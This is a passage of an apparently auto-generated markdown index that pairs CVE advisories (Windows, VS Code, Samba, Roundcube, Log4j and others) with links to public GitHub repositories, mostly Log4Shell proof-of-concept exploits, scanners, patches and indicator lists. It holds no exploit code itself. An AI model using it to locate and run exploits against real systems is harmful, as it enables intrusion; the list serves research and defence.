+- [0rx1/cve-2021-43858](https://github.com/0rx1/cve-2021-43858)
+- [khuntor/CVE-2021-43858-MinIO](https://github.com/khuntor/CVE-2021-43858-MinIO)
+
+### CVE-2021-43883 (2021-12-15)
+
+Windows Installer Elevation of Privilege Vulnerability
+
+
+- [jbaines-r7/shakeitoff](https://github.com/jbaines-r7/shakeitoff)
+
+### CVE-2021-43891 (2021-12-15)
+
+Visual Studio Code Remote Code Execution Vulnerability
+
+
+- [parsiya/code-wsl-rce](https://github.com/parsiya/code-wsl-rce)
+
+### CVE-2021-43893 (2021-12-15)
+
+Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability
+
+
+- [jbaines-r7/blankspace](https://github.com/jbaines-r7/blankspace)
+
+### CVE-2021-43908 (2021-12-15)
+
+Visual Studio Code Spoofing Vulnerability
+
+
+- [Sudistark/vscode-rce-electrovolt](https://github.com/Sudistark/vscode-rce-electrovolt)
+
+### CVE-2021-43936 (2021-12-06)
+
+The software allows the attacker to upload or transfer files of dangerous types to the WebHMI portal, that may be automatically processed within the product's environment or lead to arbitrary code execution.
+
+
+- [LongWayHomie/CVE-2021-43936](https://github.com/LongWayHomie/CVE-2021-43936)
+
+### CVE-2021-44026 (2021-11-19)
+
+Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search_params.
+
+
+- [pentesttoolscom/roundcube-cve-2021-44026](https://github.com/pentesttoolscom/roundcube-cve-2021-44026)
+
+### CVE-2021-44077 (2021-11-29)
+
+Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.
+
+
+- [horizon3ai/CVE-2021-44077](https://github.com/horizon3ai/CVE-2021-44077)
+- [pizza-power/Golang-CVE-2021-44077-POC](https://github.com/pizza-power/Golang-CVE-2021-44077-POC)
+
+### CVE-2021-44103
+- [paulotrindadec/CVE-2021-44103](https://github.com/paulotrindadec/CVE-2021-44103)
+
+### CVE-2021-44117 (2022-06-10)
+
+A Cross Site Request Forgery (CSRF) vulnerability exists in TheDayLightStudio Fuel CMS 1.5.0 via a POST call to /fuel/sitevariables/delete/4.
+
+
+- [warmachine-57/CVE-2021-44117](https://github.com/warmachine-57/CVE-2021-44117)
+
+### CVE-2021-44132 (2022-02-25)
+
+A command injection vulnerability in the function formImportOMCIShell of C-DATA ONU4FERW V2.1.13_X139 allows attackers to execute arbitrary commands via a crafted file.
+
+
+- [exploitwritter/CVE-2021-44132](https://github.com/exploitwritter/CVE-2021-44132)
+
+### CVE-2021-44142 (2022-02-21)
+
+The Samba vfs_fruit module uses extended file attributes (EA, xattr) to provide "...enhanced compatibility with Apple SMB clients and interoperability with a Netatalk 3 AFP fileserver." Samba versions prior to 4.13.17, 4.14.12 and 4.15.5 with vfs_fruit configured allow out-of-bounds heap read and write via specially crafted extended file attributes. A remote attacker with write access to extended file attributes can execute arbitrary code with the privileges of smbd, typically root.
+
+
+- [hrsman/Samba-CVE-2021-44142](https://github.com/hrsman/Samba-CVE-2021-44142)
+- [horizon3ai/CVE-2021-44142](https://github.com/horizon3ai/CVE-2021-44142)
+- [gudyrmik/CVE-2021-44142](https://github.com/gudyrmik/CVE-2021-44142)
+
+### CVE-2021-44168 (2022-01-04)
+
+A download of code without integrity check vulnerability in the "execute restore src-vis" command of FortiOS before 7.0.3 may allow a local authenticated attacker to download arbitrary files on the device via specially crafted update packages.
+
+
+- [0xhaggis/CVE-2021-44168](https://github.com/0xhaggis/CVE-2021-44168)
+
+### CVE-2021-44217 (2022-01-18)
+
+In Ericsson CodeChecker through 6.18.0, a Stored Cross-site scripting (XSS) vulnerability in the comments component of the reports viewer allows remote attackers to inject arbitrary web script or HTML via the POST JSON data of the /CodeCheckerService API.
+
+
+- [Hyperkopite/CVE-2021-44217](https://github.com/Hyperkopite/CVE-2021-44217)
+
+### CVE-2021-44228 (2021-12-10)
+
+Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
+
+
+- [tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce)
+- [Glease/Healer](https://github.com/Glease/Healer)
+- [jacobtread/L4J-Vuln-Patch](https://github.com/jacobtread/L4J-Vuln-Patch)
+- [jas502n/Log4j2-CVE-2021-44228](https://github.com/jas502n/Log4j2-CVE-2021-44228)
+- [HyCraftHD/Log4J-RCE-Proof-Of-Concept](https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept)
+- [boundaryx/cloudrasp-log4j2](https://github.com/boundaryx/cloudrasp-log4j2)
+- [dbgee/CVE-2021-44228](https://github.com/dbgee/CVE-2021-44228)
+- [CreeperHost/Log4jPatcher](https://github.com/CreeperHost/Log4jPatcher)
+- [DragonSurvivalEU/RCE](https://github.com/DragonSurvivalEU/RCE)
+- [simonis/Log4jPatch](https://github.com/simonis/Log4jPatch)
+- [zlepper/CVE-2021-44228-Test-Server](https://github.com/zlepper/CVE-2021-44228-Test-Server)
+- [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app)
+- [NorthwaveSecurity/log4jcheck](https://github.com/NorthwaveSecurity/log4jcheck)
+- [nkoneko/VictimApp](https://github.com/nkoneko/VictimApp)
+- [lhotari/pulsar-docker-images-patch-CVE-2021-44228](https://github.com/lhotari/pulsar-docker-images-patch-CVE-2021-44228)
+- [1in9e/Apache-Log4j2-RCE](https://github.com/1in9e/Apache-Log4j2-RCE)
+- [KosmX/CVE-2021-44228-example](https://github.com/KosmX/CVE-2021-44228-example)
+- [greymd/CVE-2021-44228](https://github.com/greymd/CVE-2021-44228)
+- [mubix/CVE-2021-44228-Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes)
+- [OopsieWoopsie/mc-log4j-patcher](https://github.com/OopsieWoopsie/mc-log4j-patcher)
+- [wheez-y/CVE-2021-44228-kusto](https://github.com/wheez-y/CVE-2021-44228-kusto)
+- [izzyacademy/log4shell-mitigation](https://github.com/izzyacademy/log4shell-mitigation)
+- [0xst4n/CVE-2021-44228-poc](https://github.com/0xst4n/CVE-2021-44228-poc)
+- [takito1812/log4j-detect](https://github.com/takito1812/log4j-detect)
+- [winnpixie/log4noshell](https://github.com/winnpixie/log4noshell)
+- [Azeemering/CVE-2021-44228-DFIR-Notes](https://github.com/Azeemering/CVE-2021-44228-DFIR-Notes)
+- [Puliczek/CVE-2021-44228-PoC-log4j-bypass-words](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words)
+- [kozmer/log4j-shell-poc](https://github.com/kozmer/log4j-shell-poc)
+- [alexandreroman/cve-2021-44228-workaround-buildpack](https://github.com/alexandreroman/cve-2021-44228-workaround-buildpack)
+- [Adikso/minecraft-log4j-honeypot](https://github.com/Adikso/minecraft-log4j-honeypot)
+- [racoon-rac/CVE-2021-44228](https://github.com/racoon-rac/CVE-2021-44228)
+- [TheArqsz/CVE-2021-44228-PoC](https://github.com/TheArqsz/CVE-2021-44228-PoC)
+- [1lann/log4shelldetect](https://github.com/1lann/log4shelldetect)
+- [binganao/Log4j2-RCE](https://github.com/binganao/Log4j2-RCE)
+- [phoswald/sample-ldap-exploit](https://github.com/phoswald/sample-ldap-exploit)
+- [rakutentech/jndi-ldap-test-server](https://github.com/rakutentech/jndi-ldap-test-server)
+- [uint0/cve-2021-44228--spring-hibernate](https://github.com/uint0/cve-2021-44228--spring-hibernate)
+- [saharNooby/log4j-vulnerability-patcher-agent](https://github.com/saharNooby/log4j-vulnerability-patcher-agent)
+- [f0ng/log4j2burpscanner](https://github.com/f0ng/log4j2burpscanner)
+- [M1ngGod/CVE-2021-44228-Log4j-lookup-Rce](https://github.com/M1ngGod/CVE-2021-44228-Log4j-lookup-Rce)
+- [byteboycn/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/byteboycn/CVE-2021-44228-Apache-Log4j-Rce)
+- [lhotari/log4shell-mitigation-tester](https://github.com/lhotari/log4shell-mitigation-tester)
+- [toramanemre/log4j-rce-detect-waf-bypass](https://github.com/toramanemre/log4j-rce-detect-waf-bypass)
+- [logpresso/CVE-2021-44228-Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner)
+- [vorburger/Log4j_CVE-2021-44228](https://github.com/vorburger/Log4j_CVE-2021-44228)
+- [gauthamg/log4j2021_vul_test](https://github.com/gauthamg/log4j2021_vul_test)
+- [b-abderrahmane/CVE-2021-44228-playground](https://github.com/b-abderrahmane/CVE-2021-44228-playground)
+- [leetxyz/CVE-2021-44228-Advisories](https://github.com/leetxyz/CVE-2021-44228-Advisories)
+- [cado-security/log4shell](https://github.com/cado-security/log4shell)
+- [WYSIIWYG/Log4J_0day_RCE](https://github.com/WYSIIWYG/Log4J_0day_RCE)
+- [mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform](https://github.com/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform)
+- [Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs](https://github.com/Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs)
+- [zzzz0317/log4j2-vulnerable-spring-app](https://github.com/zzzz0317/log4j2-vulnerable-spring-app)
+- [datadavev/test-44228](https://github.com/datadavev/test-44228)
+- [LemonCraftRu/JndiRemover](https://github.com/LemonCraftRu/JndiRemover)
+- [zhangxvx/Log4j-Rec-CVE-2021-44228](https://github.com/zhangxvx/Log4j-Rec-CVE-2021-44228)
+- [darkarnium/Log4j-CVE-Detect](https://github.com/darkarnium/Log4j-CVE-Detect)
+- [chilliwebs/CVE-2021-44228_Example](https://github.com/chilliwebs/CVE-2021-44228_Example)
+- [irgoncalves/f5-waf-enforce-sig-CVE-2021-44228](https://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228)
+- [jeffbryner/log4j-docker-vaccine](https://github.com/jeffbryner/log4j-docker-vaccine)
+- [mergebase/log4j-detector](https://github.com/mergebase/log4j-detector)
+- [unlimitedsola/log4j2-rce-poc](https://github.com/unlimitedsola/log4j2-rce-poc)
+- [Jeromeyoung/log4j2burpscanner](https://github.com/Jeromeyoung/log4j2burpscanner)
+- [corretto/hotpatch-for-apache-log4j2](https://github.com/corretto/hotpatch-for-apache-log4j2)
+- [alexandre-lavoie/python-log4rce](https://github.com/alexandre-lavoie/python-log4rce)
+- [RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs](https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs)
+- [mzlogin/CVE-2021-44228-Demo](https://github.com/mzlogin/CVE-2021-44228-Demo)
+- [blake-fm/vcenter-log4j](https://github.com/blake-fm/vcenter-log4j)
+- [creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review](https://github.com/creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review)
+- [uint0/cve-2021-44228-helpers](https://github.com/uint0/cve-2021-44228-helpers)
+- [RK800-DEV/apache-log4j-poc](https://github.com/RK800-DEV/apache-log4j-poc)
+- [sud0x00/log4j-CVE-2021-44228](https://github.com/sud0x00/log4j-CVE-2021-44228)
+- [DiCanio/CVE-2021-44228-docker-example](https://github.com/DiCanio/CVE-2021-44228-docker-example)
+- [myyxl/cve-2021-44228-minecraft-poc](https://github.com/myyxl/cve-2021-44228-minecraft-poc)
+- [RrUZi/Awesome-CVE-2021-44228](https://github.com/RrUZi/Awesome-CVE-2021-44228)
+- [future-client/CVE-2021-44228](https://github.com/future-client/CVE-2021-44228)
+- [CodeShield-Security/Log4JShell-Bytecode-Detector](https://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector)
+- [Crane-Mocker/log4j-poc](https://github.com/Crane-Mocker/log4j-poc)
+- [dtact/divd-2021-00038--log4j-scanner](https://github.com/dtact/divd-2021-00038--log4j-scanner)
+- [kali-dass/CVE-2021-44228-log4Shell](https://github.com/kali-dass/CVE-2021-44228-log4Shell)
+- [pravin-pp/log4j2-CVE-2021-44228](https://github.com/pravin-pp/log4j2-CVE-2021-44228)
+- [Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228](https://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228)
+- [urholaukkarinen/docker-log4shell](https://github.com/urholaukkarinen/docker-log4shell)
+- [ssl/scan4log4j](https://github.com/ssl/scan4log4j)
+- [infiniroot/nginx-mitigate-log4shell](https://github.com/infiniroot/nginx-mitigate-log4shell)
+- [lohanichaten/log4j-cve-2021-44228](https://github.com/lohanichaten/log4j-cve-2021-44228)
+- [authomize/log4j-log4shell-affected](https://github.com/authomize/log4j-log4shell-affected)
+- [guardicode/CVE-2021-44228_IoCs](https://github.com/guardicode/CVE-2021-44228_IoCs)
+- [fireflyingup/log4j-poc](https://github.com/fireflyingup/log4j-poc)
+- [qingtengyun/cve-2021-44228-qingteng-patch](https://github.com/qingtengyun/cve-2021-44228-qingteng-patch)
+- [nccgroup/log4j-jndi-be-gone](https://github.com/nccgroup/log4j-jndi-be-gone)
+- [qingtengyun/cve-2021-44228-qingteng-online-patch](https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch)
+- [tasooshi/horrors-log4shell](https://github.com/tasooshi/horrors-log4shell)
+- [Hydragyrum/evil-rmi-server](https://github.com/Hydragyrum/evil-rmi-server)
+- [twseptian/spring-boot-log4j-cve-2021-44228-docker-lab](https://github.com/twseptian/spring-boot-log4j-cve-2021-44228-docker-lab)
+- [OlafHaalstra/log4jcheck](https://github.com/OlafHaalstra/log4jcheck)
+- [Panyaprach/Prove-CVE-2021-44228](https://github.com/Panyaprach/Prove-CVE-2021-44228)
+- [momos1337/Log4j-RCE](https://github.com/momos1337/Log4j-RCE)
+- [palominoinc/cve-2021-44228-log4j-mitigation](https://github.com/palominoinc/cve-2021-44228-log4j-mitigation)
+- [cyberxml/log4j-poc](https://github.com/cyberxml/log4j-poc)
+- [corneacristian/Log4J-CVE-2021-44228-RCE](https://github.com/corneacristian/Log4J-CVE-2021-44228-RCE)
+- [Diverto/nse-log4shell](https://github.com/Diverto/nse-log4shell)
+- [dotPY-hax/log4py](https://github.com/dotPY-hax/log4py)
+- [sunnyvale-it/CVE-2021-44228-PoC](https://github.com/sunnyvale-it/CVE-2021-44228-PoC)
+- [maxant/log4j2-CVE-2021-44228](https://github.com/maxant/log4j2-CVE-2021-44228)
+- [atnetws/fail2ban-log4j](https://github.com/atnetws/fail2ban-log4j)
+- [kimobu/cve-2021-44228](https://github.com/kimobu/cve-2021-44228)
+- [KainsRache/anti-jndi](https://github.com/KainsRache/anti-jndi)
+- [bigsizeme/Log4j-check](https://github.com/bigsizeme/Log4j-check)
+- [pedrohavay/exploit-CVE-2021-44228](https://github.com/pedrohavay/exploit-CVE-2021-44228)
+- [0xRyan/log4j-nullroute](https://github.com/0xRyan/log4j-nullroute)
+- [fireeye/CVE-2021-44228](https://github.com/fireeye/CVE-2021-44228)
+- [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan)
+- [rubo77/log4j_checker_beta](https://github.com/rubo77/log4j_checker_beta)
+- [thecyberneh/Log4j-RCE-Exploiter](https://github.com/thecyberneh/Log4j-RCE-Exploiter)
+- [halibobor/log4j2](https://github.com/halibobor/log4j2)
+- [sourcegraph/log4j-cve-code-search-resources](https://github.com/sourcegraph/log4j-cve-code-search-resources)
+- [thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832](https://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832)
+- [helsecert/CVE-2021-44228](https://github.com/helsecert/CVE-2021-44228)
+- [markuman/aws-log4j-mitigations](https://github.com/markuman/aws-log4j-mitigations)
+- [tuyenee/Log4shell](https://github.com/tuyenee/Log4shell)
+- [JiuBanSec/Log4j-CVE-2021-44228](https://github.com/JiuBanSec/Log4j-CVE-2021-44228)
+- [ycdxsb/Log4Shell-CVE-2021-44228-ENV](https://github.com/ycdxsb/Log4Shell-CVE-2021-44228-ENV)
+- [avwolferen/Sitecore.Solr-log4j-mitigation](https://github.com/avwolferen/Sitecore.Solr-log4j-mitigation)
+- [kek-Sec/log4j-scanner-CVE-2021-44228](https://github.com/kek-Sec/log4j-scanner-CVE-2021-44228)
+- [Camphul/log4shell-spring-framework-research](https://github.com/Camphul/log4shell-spring-framework-research)
+- [lov3r/cve-2021-44228-log4j-exploits](https://github.com/lov3r/cve-2021-44228-log4j-exploits)
+- [sinakeshmiri/log4jScan](https://github.com/sinakeshmiri/log4jScan)
+- [0xDexter0us/Log4J-Scanner](https://github.com/0xDexter0us/Log4J-Scanner)
+- [LutziGoz/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228](https://github.com/LutziGoz/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228)
+- [0xsyr0/Log4Shell](https://github.com/0xsyr0/Log4Shell)
+- [1hakusai1/log4j-rce-CVE-2021-44228](https://github.com/1hakusai1/log4j-rce-CVE-2021-44228)
+- [jeffli1024/log4j-rce-test](https://github.com/jeffli1024/log4j-rce-test)
+- [zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service](https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service)
+- [manuel-alvarez-alvarez/log4j-cve-2021-44228](https://github.com/manuel-alvarez-alvarez/log4j-cve-2021-44228)
+- [VNYui/CVE-2021-44228](https://github.com/VNYui/CVE-2021-44228)
+- [flxhaas/Scan-CVE-2021-44228](https://github.com/flxhaas/Scan-CVE-2021-44228)
+- [justakazh/Log4j-CVE-2021-44228](https://github.com/justakazh/Log4j-CVE-2021-44228)
+- [irgoncalves/f5-waf-quick-patch-cve-2021-44228](https://github.com/irgoncalves/f5-waf-quick-patch-cve-2021-44228)
+- [madCdan/JndiLookup](https://github.com/madCdan/JndiLookup)
+- [Koupah/MC-Log4j-Patcher](https://github.com/Koupah/MC-Log4j-Patcher)
+- [AlexandreHeroux/Fix-CVE-2021-44228](https://github.com/AlexandreHeroux/Fix-CVE-2021-44228)
+- [kossatzd/log4j-CVE-2021-44228-test](https://github.com/kossatzd/log4j-CVE-2021-44228-test)
+- [tobiasoed/log4j-CVE-2021-44228](https://github.com/tobiasoed/log4j-CVE-2021-44228)
+- [hackinghippo/log4shell_ioc_ips](https://github.com/hackinghippo/log4shell_ioc_ips)
+- [p3dr16k/log4j-1.2.15-mod](https://github.com/p3dr16k/log4j-1.2.15-mod)
+- [claranet/ansible-role-log4shell](https://github.com/claranet/ansible-role-log4shell)
+- [taurusxin/CVE-2021-44228](https://github.com/taurusxin/CVE-2021-44228)
+- [corelight/cve-2021-44228](https://github.com/corelight/cve-2021-44228)
+- [rodfer0x80/log4j2-prosecutor](https://github.com/rodfer0x80/log4j2-prosecutor)
+- [yanghaoi/CVE-2021-44228_Log4Shell](https://github.com/yanghaoi/CVE-2021-44228_Log4Shell)
+- [lfama/log4j_checker](https://github.com/lfama/log4j_checker)
+- [threatmonit/Log4j-IOCs](https://github.com/threatmonit/Log4j-IOCs)
+- [ben-smash/l4j-info](https://github.com/ben-smash/l4j-info)
+- [strawhatasif/log4j-test](https://github.com/strawhatasif/log4j-test)
+- [giterlizzi/nmap-log4shell](https://github.com/giterlizzi/nmap-log4shell)
+- [tica506/Siem-queries-for-CVE-2021-44228](https://github.com/tica506/Siem-queries-for-CVE-2021-44228)
+- [chilit-nl/log4shell-example](https://github.com/chilit-nl/log4shell-example)
+- [Occamsec/log4j-checker](https://github.com/Occamsec/log4j-checker)
+- [snatalius/log4j2-CVE-2021-44228-poc-local](https://github.com/snatalius/log4j2-CVE-2021-44228-poc-local)
+- [Contrast-Security-OSS/CVE-2021-44228](https://github.com/Contrast-Security-OSS/CVE-2021-44228)
+- [back2root/log4shell-rex](https://github.com/back2root/log4shell-rex)
+- [alexbakker/log4shell-tools](https://github.com/alexbakker/log4shell-tools)
+- [perryflynn/find-log4j](https://github.com/perryflynn/find-log4j)
+- [5l1v3r1/jndiRep](https://github.com/5l1v3r1/jndiRep)
+- [alpacamybags118/log4j-cve-2021-44228-sample](https://github.com/alpacamybags118/log4j-cve-2021-44228-sample)
+- [sandarenu/log4j2-issue-check](https://github.com/sandarenu/log4j2-issue-check)
+- [roticagas/CVE-2021-44228-Demo](https://github.com/roticagas/CVE-2021-44228-Demo)
+- [Woahd/log4j-urlscanner](https://github.com/Woahd/log4j-urlscanner)
+- [faisalfs10x/Log4j2-CVE-2021-44228-revshell](https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell)
+- [gcmurphy/chk_log4j](https://github.com/gcmurphy/chk_log4j)
+- [0xInfection/LogMePwn](https://github.com/0xInfection/LogMePwn)
+- [toramanemre/apache-solr-log4j-CVE-2021-44228](https://github.com/toramanemre/apache-solr-log4j-CVE-2021-44228)
+- [codiobert/log4j-scanner](https://github.com/codiobert/log4j-scanner)
+- [cbuschka/log4j2-rce-recap](https://github.com/cbuschka/log4j2-rce-recap)
+- [andrii-kovalenko-celonis/log4j-vulnerability-demo](https://github.com/andrii-kovalenko-celonis/log4j-vulnerability-demo)
+- [dark-ninja10/Log4j-CVE-2021-44228](https://github.com/dark-ninja10/Log4j-CVE-2021-44228)
+- [fox-it/log4j-finder](https://github.com/fox-it/log4j-finder)
+- [34zY/JNDI-Exploit-1.2-log4shell](https://github.com/34zY/JNDI-Exploit-1.2-log4shell)
+- [didoatanasov/cve-2021-44228](https://github.com/didoatanasov/cve-2021-44228)
+- [ReynerGonzalez/Security-Log4J-Tester](https://github.com/ReynerGonzalez/Security-Log4J-Tester)
+- [ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228](https://github.com/ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228)
+- [wortell/log4j](https://github.com/wortell/log4j)
+- [municipalparkingservices/CVE-2021-44228-Scanner](https://github.com/municipalparkingservices/CVE-2021-44228-Scanner)
+- [BinaryDefense/log4j-honeypot-flask](https://github.com/BinaryDefense/log4j-honeypot-flask)
+- [MalwareTech/Log4jTools](https://github.com/MalwareTech/Log4jTools)
+- [mufeedvh/log4jail](https://github.com/mufeedvh/log4jail)
+- [guerzon/log4shellpoc](https://github.com/guerzon/log4shellpoc)
+- [ab0x90/CVE-2021-44228_PoC](https://github.com/ab0x90/CVE-2021-44228_PoC)
+- [stripe/log4j-remediation-tools](https://github.com/stripe/log4j-remediation-tools)
+- [xsultan/log4jshield](https://github.com/xsultan/log4jshield)
+- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder)
+- [0xThiebaut/CVE-2021-44228](https://github.com/0xThiebaut/CVE-2021-44228)
+- [CERTCC/CVE-2021-44228_scanner](https://github.com/CERTCC/CVE-2021-44228_scanner)
+- [CrackerCat/CVE-2021-44228-Log4j-Payloads](https://github.com/CrackerCat/CVE-2021-44228-Log4j-Payloads)
+- [dbzoo/log4j_scanner](https://github.com/dbzoo/log4j_scanner)
+- [jeremyrsellars/CVE-2021-44228_scanner](https://github.com/jeremyrsellars/CVE-2021-44228_scanner)
+- [JustinDPerkins/C1-WS-LOG4SHELL](https://github.com/JustinDPerkins/C1-WS-LOG4SHELL)
+- [VinniMarcon/Log4j-Updater](https://github.com/VinniMarcon/Log4j-Updater)
+- [bhprin/log4j-vul](https://github.com/bhprin/log4j-vul)
+- [avirahul007/CVE-2021-44228](https://github.com/avirahul007/CVE-2021-44228)
+- [rgl/log4j-log4shell-playground](https://github.com/rgl/log4j-log4shell-playground)
+- [anuvindhs/how-to-check-patch-secure-log4j-CVE-2021-44228](https://github.com/anuvindhs/how-to-check-patch-secure-log4j-CVE-2021-44228)
+- [KeysAU/Get-log4j-Windows.ps1](https://github.com/KeysAU/Get-log4j-Windows.ps1)
+- [kubearmor/log4j-CVE-2021-44228](https://github.com/kubearmor/log4j-CVE-2021-44228)
+- [jyotisahu98/logpresso-CVE-2021-44228-Scanner](https://github.com/jyotisahu98/logpresso-CVE-2021-44228-Scanner)
+- [gitlab-de/log4j-resources](https://github.com/gitlab-de/log4j-resources)
+- [redhuntlabs/Log4JHunt](https://github.com/redhuntlabs/Log4JHunt)
+- [mss/log4shell-hotfix-side-effect](https://github.com/mss/log4shell-hotfix-side-effect)
+- [MeterianHQ/log4j-vuln-coverage-check](https://github.com/MeterianHQ/log4j-vuln-coverage-check)
+- [sebiboga/jmeter-fix-cve-2021-44228-windows](https://github.com/sebiboga/jmeter-fix-cve-2021-44228-windows)
+- [mitiga/log4shell-cloud-scanner](https://github.com/mitiga/log4shell-cloud-scanner)
+- [isuruwa/Log4j](https://github.com/isuruwa/Log4j)
+- [honeynet/log4shell-data](https://github.com/honeynet/log4shell-data)
+- [inettgmbh/checkmk-log4j-scanner](https://github.com/inettgmbh/checkmk-log4j-scanner)
+- [b1tm0n3r/CVE-2021-44228](https://github.com/b1tm0n3r/CVE-2021-44228)
+- [VerveIndustrialProtection/CVE-2021-44228-Log4j](https://github.com/VerveIndustrialProtection/CVE-2021-44228-Log4j)
+- [alenazi90/log4j](https://github.com/alenazi90/log4j)
+- [pmontesd/log4j-cve-2021-44228](https://github.com/pmontesd/log4j-cve-2021-44228)
+- [LiveOverflow/log4shell](https://github.com/LiveOverflow/log4shell)
+- [aws-samples/kubernetes-log4j-cve-2021-44228-node-agent](https://github.com/aws-samples/kubernetes-log4j-cve-2021-44228-node-agent)
+- [michaelsanford/Log4Shell-Honeypot](https://github.com/michaelsanford/Log4Shell-Honeypot)
+- [thomaspatzke/Log4Pot](https://github.com/thomaspatzke/Log4Pot)
+- [ubitech/cve-2021-44228-rce-poc](https://github.com/ubitech/cve-2021-44228-rce-poc)
+- [rv4l3r3/log4v-vuln-check](https://github.com/rv4l3r3/log4v-vuln-check)
+- [dpomnean/log4j_scanner_wrapper](https://github.com/dpomnean/log4j_scanner_wrapper)
+- [roxas-tan/CVE-2021-44228](https://github.com/roxas-tan/CVE-2021-44228)
+- [shamo0/CVE-2021-44228](https://github.com/shamo0/CVE-2021-44228)
+- [snow0715/log4j-Scan-Burpsuite](https://github.com/snow0715/log4j-Scan-Burpsuite)
+- [Joefreedy/Log4j-Windows-Scanner](https://github.com/Joefreedy/Log4j-Windows-Scanner)
+- [Nanitor/log4fix](https://github.com/Nanitor/log4fix)
+- [Gyrfalc0n/scanlist-log4j](https://github.com/Gyrfalc0n/scanlist-log4j)
+- [korteke/log4shell-demo](https://github.com/korteke/log4shell-demo)
+- [recanavar/vuln_spring_log4j2](https://github.com/recanavar/vuln_spring_log4j2)
+- [DXC-StrikeForce/Burp-Log4j-HammerTime](https://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime)
+- [andalik/log4j-filescan](https://github.com/andalik/log4j-filescan)
+- [lonecloud/CVE-2021-44228-Apache-Log4j](https://github.com/lonecloud/CVE-2021-44228-Apache-Log4j)
+- [gyaansastra/CVE-2021-44228](https://github.com/gyaansastra/CVE-2021-44228)
+- [axisops/CVE-2021-44228](https://github.com/axisops/CVE-2021-44228)
+- [kal1gh0st/MyLog4Shell](https://github.com/kal1gh0st/MyLog4Shell)
+- [hozyx/log4shell](https://github.com/hozyx/log4shell)
+- [andypitcher/Log4J_checker](https://github.com/andypitcher/Log4J_checker)
+- [Vulnmachines/log4j-cve-2021-44228](https://github.com/Vulnmachines/log4j-cve-2021-44228)
+- [kannthu/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/kannthu/CVE-2021-44228-Apache-Log4j-Rce)
+- [Kr0ff/CVE-2021-44228](https://github.com/Kr0ff/CVE-2021-44228)
+- [suuhm/log4shell4shell](https://github.com/suuhm/log4shell4shell)
+- [wajda/log4shell-test-exploit](https://github.com/wajda/log4shell-test-exploit)
+- [obscuritylabs/log4shell-poc-lab](https://github.com/obscuritylabs/log4shell-poc-lab)
+- [Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228](https://github.com/Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228)
+- [Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE](https://github.com/Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE)
+- [rohankumardubey/CVE-2021-44228_scanner](https://github.com/rohankumardubey/CVE-2021-44228_scanner)
+- [sysadmin0815/Fix-Log4j-PowershellScript](https://github.com/sysadmin0815/Fix-Log4j-PowershellScript)
+- [RenYuH/log4j-lookups-vulnerability](https://github.com/RenYuH/log4j-lookups-vulnerability)
+- [scheibling/py-log4shellscanner](https://github.com/scheibling/py-log4shellscanner)
+- [zaneef/CVE-2021-44228](https://github.com/zaneef/CVE-2021-44228)
+- [metodidavidovic/log4j-quick-scan](https://github.com/metodidavidovic/log4j-quick-scan)
+- [WatchGuard-Threat-Lab/log4shell-iocs](https://github.com/WatchGuard-Threat-Lab/log4shell-iocs)
+- [Aschen/log4j-patched](https://github.com/Aschen/log4j-patched)
+- [Nikolas-Charalambidis/cve-2021-44228](https://github.com/Nikolas-Charalambidis/cve-2021-44228)
+- [m0rath/detect-log4j-exploitable](https://github.com/m0rath/detect-log4j-exploitable)
+- [nu11secur1ty/CVE-2021-44228-VULN-APP](https://github.com/nu11secur1ty/CVE-2021-44228-VULN-APP)
